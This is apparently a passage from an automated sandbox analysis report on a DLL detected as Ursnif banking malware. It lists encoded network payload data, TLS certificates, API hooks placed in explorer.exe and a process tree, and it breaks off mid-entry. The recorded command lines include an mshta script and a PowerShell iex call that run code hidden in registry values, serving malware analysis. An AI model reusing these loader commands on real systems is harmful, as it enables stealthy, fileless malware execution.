4d 79 4f 4a 45 73 66 6f 59 36 38 39 69 33 5a 30 36 71 4c 65 6d 62 4e 62 56 68 64 32 52 47 2b 32 79 44 58 6a 2b 78 6e 39 59 4e 74 79 61 47 62 66 70 51 45 6a 37 75 6e 32 6b 44 37 7a 73 7a 32 38 42 71 59 6d 43 51 57 2f 63 71 6e 2f 42 73 50 2f 33 56 51 78 62 67 35 52 59 38 47 77 44 30 4a 32 42 37 52 35 56 53 31 54 55 59 72 6d 6c 4a 38 4d 66 6e 59 69 51 51 6c 6a 57 49 79 6f 4b 2b 7a 6a 61 56 41 72 47 6e 66 74 4c 78 70 65 35 5a 2f 45 6d 61 44 5a 52 50 79 64 52 39 6e 64 65 48 6f 41 6d 2b 48 72 78 65 37 65 4a 72 7a 51 55 33 68 35 33 61 49 54 52 34 6a 46 52 70 70 59 35 79 72 4d 45 7a 4e 7a 4c 35 31 44 4f 36 43 71 4d 71 39 47 67 6f 77 49 66 69 73 6b 44 4b 61 33 75 43 58 2f 77 6c 71 75 51 72 4e 53 6e 61 2b 55 55 50 31 52 63 41 79 53 6c 43 4b 78 4c 52 70 45 2f 35 42 6e 56 55 31 49 32 6e 36 53 75 33 55 69 74 76 69 4d 63 44 6d 35 31 58 76 44 4b 53 69 47 41 48 61 6d 51 64 38 63 54 52 62 42 2b 6f 6d 34 67 69 46 36 7a 71 52 41 57 37 6b 78 44 77 64 74 71 73 47 56 72 48 31 41 5a 63 6d 42 6d 5a 4c 4a 67 73 35 57 6a 55 6b 37 46 69 31 4b 69 46 61 6f 4c 34 67 63 6f 7a 52 4f 4e 46 35 53 69 42 48 53 63 7a 35 34 53 6d 44 66 6d 50 42 30 6c 59 77 4c 57 73 6d 6f 42 4b 58 33 48 6f 61 44 66 6d 69 70 49 45 7a 32 6c 55 53 6b 63 33 33 71 2f 57 35 7a 64 38 61 4c 57 6b 46 51 2b 61 56 78 6e 76 75 2b 74 39 4a 53 43 32 38 6b 59 75 59 71 34 42 35 5a 72 68 57 6d 51 6f 37 43 6f 36 44 69 6e 49 62 48 42 38 4f 62 51 35 4b 32 42 4b 37 4f 44 39 6d 47 6d 2b 58 77 55 52 63 34 33 4d 45 47 78 69 2f 32 68 48 42 53 62 34 48 62 6d 38 64 38 5a 6a 51 6d 75 53 4e 6e 57 53 76 6e 43 70 44 4c 76 32 73 6d 68 54 43 35 6c 53 33 71 45 6d 56 76 34 32 71 53 35 68 33 73 61 67 43 55 4f 6f 4b 63 49 31 58 62 55 56 38 5a 51 68 37 4e 4f 4d 30 75 34 44 53 66 33 62 70 34 7a 55 67 62 52 57 61 52 56 41 71 38 42 69 39 42 74 37 30 74 46 56 6b 6c 4b 48 43 56 37 46 5a 39 7a 57 7a 64 30 73 71 7a 67 6e 33 75 58 75 4d 32 50 62 31 67 66 72 6f 71 58 76 32 66 48 4d 32 64 68 70 31 5a 4b 44 56 44 6f 70 42 47 6e 32 4c 32 39 59 75 64 6b 6e 36 79 32 6a 4e 30 31 73 2b 64 76 4a 54 43 65 42 67 2b 44 59 65 63 4c 78 69 57 49 47 6c 33 35 41 30 6b 63 4a 74 6b 58 76 74 54 45 71 72 2f 49 55 48 45 62 4c 62 62 52 44 47 74 56 58 4f 4f 53 67 33 74 6a 6d 64 4a 37 63 56 45 75 56 4e 70 7a 4f 6c 35 45 57 Data Ascii: u1+2PhoC7oA4PiWX5/kd/PbArS8mhUTp8Wx9QbuYlfzhBcjbLWhD/YW6FqXkwkatQp53ITw/Roh+K12g3+SDXLHsZg1onRptqS6cJNnKM4CsTKp08YZQzLgifvh4BR49HtrKlrlIttbbe1Sl38cWQ+R6Q0ImcKQt2HFTCOf9RawFm5LgEG/Jhnked1mQmSB+wDHiOh+DEHm0Fk1IHlRGHMyOJEsfoY689i3Z06qLembNbVhd2RG+2yDXj+xn9YNtyaGbfpQEj7un2kD7zsz28BqYmCQW/cqn/BsP/3VQxbg5RY8GwD0J2B7R5VS1TUYrmlJ8MfnYiQQljWIyoK+zjaVArGnftLxpe5Z/EmaDZRPydR9ndeHoAm+Hrxe7eJrzQU3h53aITR4jFRppY5yrMEzNzL51DO6CqMq9GgowIfiskDKa3uCX/wlquQrNSna+UUP1RcAySlCKxLRpE/5BnVU1I2n6Su3UitviMcDm51XvDKSiGAHamQd8cTRbB+om4giF6zqRAW7kxDwdtqsGVrH1AZcmBmZLJgs5WjUk7Fi1KiFaoL4gcozRONF5SiBHScz54SmDfmPB0lYwLWsmoBKX3HoaDfmipIEz2lUSkc33q/W5zd8aLWkFQ+aVxnvu+t9JSC28kYuYq4B5ZrhWmQo7Co6DinIbHB8ObQ5K2BK7OD9mGm+XwURc43MEGxi/2hHBSb4Hbm8d8ZjQmuSNnWSvnCpDLv2smhTC5lS3qEmVv42qS5h3sagCUOoKcI1XbUV8ZQh7NOM0u4DSf3bp4zUgbRWaRVAq8Bi9Bt70tFVklKHCV7FZ9zWzd0sqzgn3uXuM2Pb1gfroqXv2fHM2dhp1ZKDVDopBGn2L29Yudkn6y2jN01s+dvJTCeBg+DYecLxiWIGl35A0kcJtkXvtTEqr/IUHEbLbbRDGtVXOOSg3tjmdJ7cVEuVNpzOl5EW
Jan 19, 2021 12:13:06.423062086 CET	10860	IN	Data Raw: 47 6d 47 71 34 4d 50 37 46 67 54 31 72 6e 74 62 38 6d 57 76 49 71 67 61 33 38 55 79 55 36 6e 45 4a 31 4e 38 54 69 6c 62 68 6e 48 66 4f 77 30 53 6e 2b 35 70 33 4d 61 55 2b 54 32 54 69 57 67 78 47 4c 43 46 2b 4e 73 47 30 72 4c 65 32 56 35 2b 72 55 Data Ascii: GmGq4MP7FgT1rntb8mWvIqga38UyU6nEJ1N8TilbhnHfOw0Sn+5p3MaU+T2TiWgxGLCF+NsG0rLe2V5+rUG6kAkLdAJ9P8kxiXs+yXls1t49Q0+FqYHKk98HeRcUXATKgbBbk140boiRELf9UJ+rs5j0e07vwFIM8tTJLGHV7I4U3cTkB6zoEY0e0PbQZIIkjtBEXKofD2XqQc0xQqf3CHYUKaKwQT2QnjNUO0Zl2HX1kY3EWgX
Jan 19, 2021 12:13:06.423078060 CET	10860	IN	Data Raw: 76 6d 42 48 53 59 5a 62 4a 33 42 32 67 35 52 6e 4b 38 4c 76 31 41 5a 70 47 32 59 4e 69 4e 76 73 6c 43 38 73 33 4a 4a 63 61 79 31 63 36 38 42 72 56 56 64 2b 70 44 73 37 62 6b 79 45 55 66 38 72 4d 48 76 63 39 34 6f 46 59 6e 78 68 66 68 77 66 70 65 Data Ascii: vmBHSYZbJ3B2g5RnK8Lv1AZpG2YNiNvslC8s3JJcay1c68BrVVd+pDs7bkyEUf8rMHvc94oFYnxhfhwfpe3GrszTuuYgyXWDRDRXJJCzoZgxfAytp0=

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Jan 19, 2021 12:11:07.245728970 CET	151.101.1.44	443	192.168.2.3	49736	CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Wed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020	Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Jan 19, 2021 12:11:07.245728970 CET	151.101.1.44	443	192.168.2.3	49736	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Sep 24 02:00:00 CEST 2020	Tue Sep 24 01:59:59 CEST 2030		9e10692f1b7f78228b2d4e424db3a98c
Jan 19, 2021 12:11:07.245946884 CET	151.101.1.44	443	192.168.2.3	49739	CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Wed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020	Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Jan 19, 2021 12:11:07.245946884 CET	151.101.1.44	443	192.168.2.3	49739	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Sep 24 02:00:00 CEST 2020	Tue Sep 24 01:59:59 CEST 2030		9e10692f1b7f78228b2d4e424db3a98c
Jan 19, 2021 12:11:07.250232935 CET	151.101.1.44	443	192.168.2.3	49735	CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Wed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020	Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Jan 19, 2021 12:11:07.250232935 CET	151.101.1.44	443	192.168.2.3	49735	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Sep 24 02:00:00 CEST 2020	Tue Sep 24 01:59:59 CEST 2030		9e10692f1b7f78228b2d4e424db3a98c
Jan 19, 2021 12:11:07.251818895 CET	151.101.1.44	443	192.168.2.3	49740	CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Wed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020	Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Jan 19, 2021 12:11:07.251818895 CET	151.101.1.44	443	192.168.2.3	49740	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Sep 24 02:00:00 CEST 2020	Tue Sep 24 01:59:59 CEST 2030		9e10692f1b7f78228b2d4e424db3a98c
Jan 19, 2021 12:11:07.251926899 CET	151.101.1.44	443	192.168.2.3	49737	CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Wed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020	Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Jan 19, 2021 12:11:07.251926899 CET	151.101.1.44	443	192.168.2.3	49737	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Sep 24 02:00:00 CEST 2020	Tue Sep 24 01:59:59 CEST 2030		9e10692f1b7f78228b2d4e424db3a98c
Jan 19, 2021 12:11:07.253712893 CET	151.101.1.44	443	192.168.2.3	49738	CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Wed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020	Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Jan 19, 2021 12:11:07.253712893 CET	151.101.1.44	443	192.168.2.3	49738	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Sep 24 02:00:00 CEST 2020	Tue Sep 24 01:59:59 CEST 2030		9e10692f1b7f78228b2d4e424db3a98c
Jan 19, 2021 12:11:07.256563902 CET	87.248.118.23	443	192.168.2.3	49733	CN=*.yahoo.com, O=Oath Inc, L=Sunnyvale, ST=California, C=US CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Jan 14 01:00:00 CET 2021 Tue Oct 22 14:00:00 CEST 2013	Wed Mar 03 00:59:59 CET 2021 Sun Oct 22 14:00:00 CEST 2028	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Jan 19, 2021 12:11:07.256563902 CET	87.248.118.23	443	192.168.2.3	49733	CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Tue Oct 22 14:00:00 CEST 2013	Sun Oct 22 14:00:00 CEST 2028		9e10692f1b7f78228b2d4e424db3a98c
Jan 19, 2021 12:11:07.258574009 CET	87.248.118.23	443	192.168.2.3	49732	CN=*.yahoo.com, O=Oath Inc, L=Sunnyvale, ST=California, C=US CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Jan 14 01:00:00 CET 2021 Tue Oct 22 14:00:00 CEST 2013	Wed Mar 03 00:59:59 CET 2021 Sun Oct 22 14:00:00 CEST 2028	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Jan 19, 2021 12:11:07.258574009 CET	87.248.118.23	443	192.168.2.3	49732	CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Tue Oct 22 14:00:00 CEST 2013	Sun Oct 22 14:00:00 CEST 2028		9e10692f1b7f78228b2d4e424db3a98c
Jan 19, 2021 12:11:07.270214081 CET	87.248.118.23	443	192.168.2.3	49734	CN=*.yahoo.com, O=Oath Inc, L=Sunnyvale, ST=California, C=US CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Jan 14 01:00:00 CET 2021 Tue Oct 22 14:00:00 CEST 2013	Wed Mar 03 00:59:59 CET 2021 Sun Oct 22 14:00:00 CEST 2028	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Jan 19, 2021 12:11:07.270214081 CET	87.248.118.23	443	192.168.2.3	49734	CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Tue Oct 22 14:00:00 CEST 2013	Sun Oct 22 14:00:00 CEST 2028		9e10692f1b7f78228b2d4e424db3a98c

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
CreateProcessAsUserW	EAT	explorer.exe
CreateProcessAsUserW	INLINE	explorer.exe
CreateProcessW	EAT	explorer.exe
CreateProcessW	INLINE	explorer.exe
CreateProcessA	EAT	explorer.exe
CreateProcessA	INLINE	explorer.exe
api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW	IAT	explorer.exe
api-ms-win-core-registry-l1-1-0.dll:RegGetValueW	IAT	explorer.exe

Processes

Process: explorer.exe, Module: KERNEL32.DLL

Function Name	Hook Type	New Data
CreateProcessAsUserW	EAT	7FFB70FF521C
CreateProcessAsUserW	INLINE	0xFF 0xF2 0x25 0x50 0x00 0x00
CreateProcessW	EAT	7FFB70FF5200
CreateProcessW	INLINE	0xFF 0xF2 0x25 0x50 0x00 0x00
CreateProcessA	EAT	7FFB70FF520E
CreateProcessA	INLINE	0xFF 0xF2 0x25 0x50 0x00 0x00

Process: explorer.exe, Module: user32.dll

Function Name	Hook Type	New Data
api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW	IAT	7FFB70FF5200
api-ms-win-core-registry-l1-1-0.dll:RegGetValueW	IAT	610212C

Process: explorer.exe, Module: WININET.dll

Function Name	Hook Type	New Data
api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW	IAT	7FFB70FF5200
api-ms-win-core-registry-l1-1-0.dll:RegGetValueW	IAT	610212C

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 6652 Parent PID: 5708

General

Start time:	12:10:58
Start date:	19/01/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe 'C:\Users\user\Desktop\mal.dll'
Imagebase:	0x3e0000
File size:	120832 bytes
MD5 hash:	2D39D4DFDE8F7151723794029AB8A034
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: regsvr32.exe PID: 6660 Parent PID: 6652

General

Start time:	12:10:59
Start date:	19/01/2021
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	regsvr32.exe /s C:\Users\user\Desktop\mal.dll
Imagebase:	0x60000
File size:	20992 bytes
MD5 hash:	426E7499F6A7346F0410DEAD0805586B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.474076066.0000000004C1C000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.421520265.0000000004E18000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.421722913.0000000004E18000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.421588649.0000000004E18000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.421746535.0000000004E18000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.421559513.0000000004E18000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.530782557.0000000002C90000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.421467795.0000000004E18000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.421622681.0000000004E18000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.421656779.0000000004E18000.00000004.00000040.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 6668 Parent PID: 6652

General

Start time:	12:10:59
Start date:	19/01/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'
Imagebase:	0xbd0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 6688 Parent PID: 6668

General

Start time:	12:10:59
Start date:	19/01/2021
Path:	C:\Program Files\internet explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	C:\Program Files\Internet Explorer\iexplore.exe
Imagebase:	0x7ff6c91e0000
File size:	823560 bytes
MD5 hash:	6465CB92B25A7BC1DF8E01D8AC5E7596
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 6736 Parent PID: 6688

General

Start time:	12:11:00
Start date:	19/01/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6688 CREDAT:17410 /prefetch:2
Imagebase:	0x8e0000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 5168 Parent PID: 6688

General

Start time:	12:12:38
Start date:	19/01/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6688 CREDAT:17426 /prefetch:2
Imagebase:	0x8e0000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 4772 Parent PID: 6688

General

Start time:	12:13:01
Start date:	19/01/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6688 CREDAT:82958 /prefetch:2
Imagebase:	0x8e0000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 4000 Parent PID: 6688

General

Start time:	12:13:03
Start date:	19/01/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6688 CREDAT:17442 /prefetch:2
Imagebase:	0x8e0000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 5088 Parent PID: 6688

General

Start time:	12:13:05
Start date:	19/01/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6688 CREDAT:82974 /prefetch:2
Imagebase:	0x8e0000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: mshta.exe PID: 4332 Parent PID: 3388

General

Start time:	12:13:11
Start date:	19/01/2021
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\Audiinrt'));if(!window.flag)close()</script>'
Imagebase:	0x7ff641410000
File size:	14848 bytes
MD5 hash:	197FC97C6A843BEBB445C1D9C58DCBDB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: powershell.exe PID: 7068 Parent PID: 4332

General

Start time:	12:13:16
Start date:	19/01/2021
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))
Imagebase:	0x7ff731fb0000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001F.00000003.541420236.000002BCC5BE0000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 1384 Parent PID: 7068

General

Start time:	12:13:17
Start date:	19/01/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: csc.exe PID: 2024 Parent PID: 7068

General

Start time:	12:13:25
Start date:	19/01/2021
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\kboh4jur\kboh4jur.cmdline'
Imagebase:	0x7ff716cb0000
File size:	2739304 bytes
MD5 hash:	B46100977911A0C9FB1C3E5F16A5017D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	moderate

Chronological Activities

Analysis Process: cvtres.exe PID: 1760 Parent PID: 2024

General

Start time:	12:13:26
Start date:	19/01/2021
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES3736.tmp' 'c:\Users\user\AppData\Local\Temp\kboh4jur\CSC3D4FC79349B84E14A11DB5BE381E50D0.TMP'
Imagebase:	0x7ff77feb0000
File size:	47280 bytes
MD5 hash:	33BB8BE0B4F547324D93D5D2725CAC3D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: csc.exe PID: 6508 Parent PID: 7068

General

Start time:	12:13:30
Start date:	19/01/2021
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xjciegge\xjciegge.cmdline'
Imagebase:	0x7ff716cb0000
File size:	2739304 bytes
MD5 hash:	B46100977911A0C9FB1C3E5F16A5017D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Chronological Activities

Analysis Process: cvtres.exe PID: 4608 Parent PID: 6508

General

